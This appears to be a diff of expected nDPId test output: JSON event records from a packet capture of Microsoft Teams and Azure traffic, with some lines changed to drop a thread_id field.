00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2238,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041687611} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2238,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041687611}
00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2258,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1587041687725,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2258,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1587041687725,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687731,"flow_last_seen":1587041687731,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041687731,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687731,"flow_last_seen":1587041687731,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1587041687731,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1587041687731,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1587041687731,"pkt":"EBMx8Tl2KDc3AG3ICABFAABM83AAAP8RRNjAqAEGwKgBAfUPADUAOAAFY+UBAAABAAAAAAAABmV1bm8tMQNhcGkPbWljcm9zb2Z0c3RyZWFtA2NvbQAAAQAB"} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2259,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1587041687731,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1587041687731,"pkt":"EBMx8Tl2KDc3AG3ICABFAABM83AAAP8RRNjAqAEGwKgBAfUPADUAOAAFY+UBAAABAAAAAAAABmV1bm8tMQNhcGkPbWljcm9zb2Z0c3RyZWFtA2NvbQAAAQAB"}
@@ -335,14 +335,14 @@
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2265,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1587041687789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687789,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8GLFAAGwGRTw0qbp3wKgBBgG77JMQ1B2QYdMMyKASIACACgAAAgQFoAEDAwgEAggKASJ3bTCEwsc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2265,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1587041687789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687789,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8GLFAAGwGRTw0qbp3wKgBBgG77JMQ1B2QYdMMyKASIACACgAAAgQFoAEDAwgEAggKASJ3bTCEwsc="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2266,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1587041687789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687789,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGifXAqAEGNKm6d+yTAbth0wzIENQdkYAQEAm+kQAAAQEICjCEwvABIndt"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2266,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1587041687789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687789,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGifXAqAEGNKm6d+yTAbth0wzIENQdkYAQEAm+kQAAAQEICjCEwvABIndt"}
00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2267,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687745,"flow_last_seen":1587041687789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041687789,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euno-1.api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2267,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687745,"flow_last_seen":1587041687789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041687789,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euno-1.api.microsoftstream.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2311,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041688190,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2311,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041688190,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2311,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041688611} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2311,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041688611}
00372{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2313,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041688190,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2313,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041688190,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2313,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041689410} 00185{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2313,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041689410}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2314,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041688190,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2314,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041688190,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2314,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041689611} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2314,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041689611}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2316,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041688190,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2316,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041688190,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2316,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041690611} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2316,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041690611}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690880,"flow_last_seen":1587041690880,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041690880,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690880,"flow_last_seen":1587041690880,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041690880,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1587041690880,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1587041690880,"pkt":"EBMx8Tl2KDc3AG3ICABFAABSJv0AAP8REUbAqAEGwKgBAfm6ADUAPoc2eGoBAAABAAAAAAAAAmRjE2FwcGxpY2F0aW9uaW5zaWdodHMJbWljcm9zb2Z0A2NvbQAAAQAB"} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1587041690880,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1587041690880,"pkt":"EBMx8Tl2KDc3AG3ICABFAABSJv0AAP8REUbAqAEGwKgBAfm6ADUAPoc2eGoBAAABAAAAAAAAAmRjE2FwcGxpY2F0aW9uaW5zaWdodHMJbWljcm9zb2Z0A2NvbQAAAQAB"}
00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690880,"flow_last_seen":1587041690880,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041690880,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"dc.applicationinsights.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2317,"source":"teams.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041690880,"flow_last_seen":1587041690880,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1587041690880,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63930,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"},"dns": {"query":"dc.applicationinsights.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -363,26 +363,26 @@
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1587041691168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041691168,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PCRAAHEGa280cmwIwKgBBgG77JWud4Fgpm4cPqASIABnNAAAAgQFoAEDAwgEAggKUqoqrDCEz\/U="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1587041691168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041691168,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PCRAAHEGa280cmwIwKgBBgG77JWud4Fgpm4cPqASIABnNAAAAgQFoAEDAwgEAggKUqoqrDCEz\/U="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2354,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1587041691169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041691169,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG2JvAqAEGNHJsCOyVAbumbhw+rneBYYAQEAml0QAAAQEICjCE0AhSqiqs"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2354,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1587041691169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041691169,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG2JvAqAEGNHJsCOyVAbumbhw+rneBYYAQEAml0QAAAQEICjCE0AhSqiqs"}
00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041691149,"flow_last_seen":1587041691169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041691169,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041691149,"flow_last_seen":1587041691169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041691169,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
00372{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2416,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041691399,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2416,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041691399,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2416,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041691410} 00185{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2416,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041691410}
00877{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2417,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1587041691582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00877{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2417,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1587041691582,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emea.ng.msg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
00361{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2419,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041691582,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2419,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041691582,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2419,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041691611} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2419,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041691611}
00890{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2430,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041682376,"flow_last_seen":1587041692001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9509,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1587041692001,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00890{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2430,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041682376,"flow_last_seen":1587041692001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9509,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1587041692001,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
